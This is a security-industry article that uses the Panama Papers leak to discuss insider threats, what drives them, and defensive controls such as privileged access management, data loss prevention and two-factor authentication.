Zero-day exploits. SQL injection. Malware. There’s plenty to worry about as a security professional. But none of those attack vectors were part of the recent massive data leak at Panamanian law firm Mossack Fonseca. This attack appears to be a good old-fashioned inside job.
Over the last year, an anonymous inside source has provided German newspaper Süddeutsche Zeitung with 11.5 million sensitive banking documents covering 214,488 offshore entities.
The fallout for world leaders has already included the resignation of the Iceland Prime Minister and a member of the FIFA ethics panel. There is mounting pressure on banks and world leaders while Panama’s national police have raided Mossack Fonseca. Future business for the firm will undoubtedly dry up.
The growing trend of leaks, and the motivations behind them
This leak is one of a string of insider revelations such as Wikileaks in 2010, Edward Snowden’s disclosures of NSA operations in 2013, the Ashley Madison hack of 2015 and the Swiss Leaks of 2015, all of which have significantly damaged the organizations that were attacked.
Malicious insiders traditionally have been motivated by financial gain, such as the AT&T employees who installed unauthorized software in September 2015 that allowed a third party the ability to unlock customer mobile devices in return for $20,000. But these recent series of leaks demonstrates the rising ethical motivation and activity for attackers or “hacktivism”.
Disgruntled employees, or employees leaving a company, are also motivated to exfiltrate data. Earlier this year, a data loss prevention (DLP) tool at the Federal Deposit Insurance Corp. (FDIC) detected the download of 44,000 banking customers’ information by an employee leaving the agency. The employee claimed that the data exfiltration was inadvertent and returned the personal device with the downloaded data four days later.
The point is that knowing the motivations for insider attacks can allow a measure of preparation for where to implement controls and look for potential data loss. Smart security professionals will consider potential hacktivism target data for this evaluation.
The controls that should be considered
There is no one silver bullet that can eliminate the risk posed by malicious or even negligent insiders. But the most obvious controls to consider are provided by privileged access management. In several of these examples, system administrators were able to walk away with information without prevention or detection. Some were even able to intentionally install malware. To reduce the risk, consider controls that limit the commands that super users or administrators can employ, as well as privileged session management that monitors or records activity. The threat of prosecution can be a deterrent to malicious acts.
Data loss prevention can also detect data exfiltration and act as an important control as well, but it should be augmented. Group policy can be used to block data transmission via USB ports. File integrity monitoring can check for unexpected changes.
There is also a threat from outsiders obtaining legitimate insider credentials and abusing those privileges. One method to reduce that risk is to employ two-factor authentication for access to sensitive information and intellectual property. If a user falls victim to a phishing attack or has their credentials compromised through social engineering, the attacker will still have to obtain a second factor such as a biometric input or a device that the user possesses.
Finally, an effective Identity Governance program should be in place, not only for compliance purposes, but to reduce the risk of excessive amounts of access. If an inside attack happens, minimized rights can minimize the potential damage. A regular collection and certification of entitlements should highlight access that falls outside of policy and govern the process of revoking that access.
Keeping up with threats is a tireless, thankless job. And not every threat is applicable to every organization. But when big stories like the release of the Panama Papers breaks, it is an opportunity to self-evaluate what level of risk your organization could be exposed to. With old-fashioned insider threats, every organization has some level of vulnerability, and board members will be taking notice. It might be a good time to make the case for budget to address it.
Related Reading: The Emergence of Identity as an Enterprise Attack Surface